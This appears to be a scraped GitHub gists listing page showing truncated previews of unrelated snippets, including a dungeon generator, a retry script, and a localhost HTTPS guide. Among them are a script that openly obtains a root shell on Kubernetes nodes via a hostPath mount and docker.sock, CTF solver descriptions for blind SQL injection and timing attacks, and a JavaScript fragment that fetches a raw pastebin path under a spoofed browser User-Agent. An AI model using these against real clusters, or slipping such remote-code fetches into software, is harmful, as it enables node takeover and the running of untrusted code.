image_extract.pyperforms character extraction on targetted against the HackerOne H1-702 CTF announcement imagedecrypt_sqli.pyperforms blind sqli data extraction with encrypted payloads targetting against the FliteThermostat APItiming_attack.pyperforms an HTTP piplining based timing against the FliteThermostat Backendwordlist_generator.pygenerates wordlists from a give corpus or set of corpuseshttplib.pyperforms efficient asynchronous HTTP requests against the FliteThermostat Backend
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [dependencies] | |
| sgx-isa = { version = "0.2", features = ["sgxstd"] } | |
| # RustCrypto, used for CMAC | |
| cmac = "0.2.0" | |
| crypto-mac = "0.7.0" | |
| aes = "0.3.2" | |
| block-cipher-trait = "0.6.2" | |
| generic-array = "0.12" |
ajxchapman
/ README.md
Last active
October 22, 2023 16:05
Scripts developed for solving HackerOne H1-702 2019 CTF
ricardodeazambuja
/ webcam-to-numpy-array-from-your-browser-in-colab.ipynb
Last active
April 22, 2020 13:29
Webcam to Numpy array from your browser in Colab
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
munificent
/ generate.c
Last active
January 27, 2025 18:14
A random dungeon generator that fits on a business card
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <time.h> // Robert Nystrom | |
| #include <stdio.h> // @munificentbob | |
| #include <stdlib.h> // for Ginny | |
| #define r return // 2008-2019 | |
| #define l(a, b, c, d) for (i y=a;y\ | |
| <b; y++) for (int x = c; x < d; x++) | |
| typedef int i;const i H=40;const i W | |
| =80;i m[40][80];i g(i x){r rand()%x; | |
| }void cave(i s){i w=g(10)+5;i h=g(6) | |
| +3;i t=g(W-w-2)+1;i u=g(H-h-2)+1;l(u |
jonlabelle
/ exec_with_retry.sh
Created
January 27, 2019 00:01
Bash script to execute a command and (exponentially) retry if it fails.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| set -e | |
| # | |
| # Executes a command and (exponentially) retries if it fails. | |
| # | |
| # Usage: | |
| # | |
| # exec_with_retry <command> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const Promise = require('bluebird'); | |
| const request = require('request'); | |
| const requestAsync = Promise.promisify(request); | |
| const USER = process.env.GITHUB_USER; | |
| exports.handler = async (event, context) => { | |
| try { | |
| if (!USER) throw new Error('GITHUB_USER env missing'); | |
| const module = event.pathParameters.module; |
jjo
/ kubectl-root-in-host-nopriv.sh
Last active
February 5, 2024 23:07
Yeah. Get a root shell at any Kubernetes *node* via `privileged: true` + `nsenter` sauce. PodSecurityPolicy will save us. DenyExecOnPrivileged didn't (kubectl-root-in-host-nopriv.sh exploits it)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/sh | |
| # Launch a Pod ab-using a hostPath mount to land on a Kubernetes node cluster as root | |
| # without requiring `privileged: true`, in particular can abuse `DenyExecOnPrivileged` | |
| # admission controller. | |
| # Pod command in turn runs a privileged container using node's /var/run/docker.sock. | |
| node=${1} | |
| case "${node}" in | |
| "") | |
| nodeSelector='' | |
| podName=${USER+${USER}-}docker-any |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| try { | |
| var https = require("https"); | |
| https | |
| .get( | |
| { | |
| hostname: "pastebin.com", | |
| path: "/raw/XLeVP82h", | |
| headers: { | |
| "User-Agent": | |
| "Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0", |
- Brainiac75 - Magnets
- Cody'sLab - Chemistry, Metallurgy, Physics
- colinfurze - Mechanics, Metalworking, Woodworking, Pyrotechnics
- DemolitionRanch - Guns
- ElectroBOOM - Electricity
- KREOSAN - Electricity
- Kurzgesagt - Philosophy, Physics
- MegaBots Inc - Robotics
- NileRed - Chemistry
- NurdRage - Chemistry
cecilemuller
/ 2019-https-localhost.md
Last active
April 26, 2025 10:48
How to create an HTTPS certificate for localhost domains
This focuses on generating the certificates for loading local virtual hosts hosted on your computer, for development only.
Do not use self-signed certificates in production ! For online certificates, use Let's Encrypt instead (tutorial).